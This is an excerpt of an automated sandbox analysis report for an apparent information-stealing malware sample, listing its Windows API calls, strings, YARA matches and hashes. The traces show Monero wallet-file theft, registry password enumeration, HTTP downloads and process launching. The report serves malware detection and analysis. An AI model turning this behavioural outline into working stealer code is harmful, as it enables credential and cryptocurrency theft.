                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                          • memset.MSVCRT ref: 00401516
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                          • API String ID: 1930502592-218353709
                                          • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                          • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                          • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                          • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00978648), ref: 00406303
                                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0097C5F8,00000000,00000000,00400100,00000000), ref: 00406385
                                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                          • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                          • lstrlenA.KERNEL32(00000000), ref: 00415383
                                          • strtok.MSVCRT(00000000,?), ref: 0041539E
                                          • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 3532888709-1526165396
                                          • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                          • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                          • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                          • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                          • StrCmpCA.SHLWAPI(?,00978648), ref: 00406147
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                          • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                          • InternetCloseHandle.WININET(a+A), ref: 00406253
                                          • InternetCloseHandle.WININET(00000000), ref: 00406260
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID: a+A$a+A
                                          • API String ID: 4287319946-2847607090
                                          • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                          • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                          • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                          • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • memset.MSVCRT ref: 022E0E83
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                          • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                          • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                          • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                          • lstrlen.KERNEL32(?), ref: 022E0F0E
                                          • memset.MSVCRT ref: 022E0F34
                                          • memset.MSVCRT ref: 022E0F48
                                            • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                            • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID:
                                          • API String ID: 1395395982-0
                                          • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                          • Instruction ID: bb69edd30aa5c02f11f638149630c00747a39274ea46de07c3087315323c12c5
                                          • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                          • Instruction Fuzzy Hash: 738180B5920318ABCF14EBE0DD91FED733AAF54304F804199A30B66185EE746B88DF59
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • memset.MSVCRT ref: 022E0E83
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                          • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                          • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                          • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                          • lstrlen.KERNEL32(?), ref: 022E0F0E
                                          • memset.MSVCRT ref: 022E0F34
                                          • memset.MSVCRT ref: 022E0F48
                                            • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                            • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID:
                                          • API String ID: 1395395982-0
                                          • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                          • Instruction ID: 0f719fcb54180e06364c7099f59309dc57ef029f76345db033b3b98ece3461f4
                                          • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                          • Instruction Fuzzy Hash: B561AEB5520318ABCF14EBE0DD85FED733AAF54304F804199A70B66185EE742B88CF59
                                          APIs
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                            • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                            • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D4B7C
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D4BA1
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D4D21
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022D504F
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D506B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D507F
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D50B0
                                          • InternetCloseHandle.WININET(00000000), ref: 022D5114
                                          • InternetCloseHandle.WININET(00000000), ref: 022D512C
                                          • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D4D7C
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • InternetCloseHandle.WININET(00000000), ref: 022D5136
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID:
                                          • API String ID: 2402878923-0
                                          • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                          • Instruction ID: 21a76691624c61f5b7b1424e415f815fb5e120f1ce242c80f8999c252b95355d
                                          • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                          • Instruction Fuzzy Hash: 7B12A972920318AACF15EBD4DD91EEEB37ABF65300F904199A10762194EF742F88DF61
                                          APIs
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                            • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                            • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                          • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022D6664
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D66D4
                                          • InternetCloseHandle.WININET(00000000), ref: 022D6756
                                          • InternetCloseHandle.WININET(00000000), ref: 022D6760
                                          • InternetCloseHandle.WININET(00000000), ref: 022D676A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID:
                                          • API String ID: 3074848878-0
                                          • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                          • Instruction ID: 010a79656eda3fd90a2a50c07f3ab8d02aca67028114a3aad40fe2fd1ca24a78
                                          • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                          • Instruction Fuzzy Hash: 2A717E75A60318ABEF24DFE4DC48BEE7779FB44700F508199E10A6B294DBB46A84CF41
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022E92D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID:
                                          • API String ID: 2244384528-0
                                          • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                          • Instruction ID: 67a4045ee0eb0c53bb6f177a654d3697e84ca9963e2100c7ff82298365760a06
                                          • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                          • Instruction Fuzzy Hash: 6B71FAB9A50208ABDB14DFE4DD84FEEB7BAFF49300F508108F506A7294DB74A944CB61
                                          APIs
                                          • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                          • memset.MSVCRT ref: 0041716A
                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                          Strings
                                          • sA, xrefs: 004172AE, 00417179, 0041717C
                                          • sA, xrefs: 00417111
                                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenProcesslstrcpymemset
                                          • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                          • API String ID: 224852652-2614523144
                                          • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                          • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                          • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                          • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022E77A9
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022E77E6
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E786A
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E7871
                                          • wsprintfA.USER32 ref: 022E78A7
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\$B
                                          • API String ID: 1544550907-183544611
                                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction ID: b090b413dba251d6d830d90180377f1f9ec6c1da5914251afc695a9631a2d21e
                                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction Fuzzy Hash: 6A418EB1D10258ABDF10DFD4CC45BEEBBB9EF58700F400199E506A7280D7756A84DBA6
                                          APIs
                                            • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                            • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                            • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                            • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                            • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                            • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                          • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                          • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                          • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                          • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                          • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                          • task.LIBCPMTD ref: 004076FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                          • String ID: :
                                          • API String ID: 3191641157-3653984579
                                          • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                          • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                          • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                          • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                          APIs
                                          • lstrcpy.KERNEL32(?,?), ref: 022E1642
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                            • Part of subcall function 022E94C7: StrStrA.SHLWAPI(?,?), ref: 022E94D3
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E167E
                                            • Part of subcall function 022E94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022E94F7
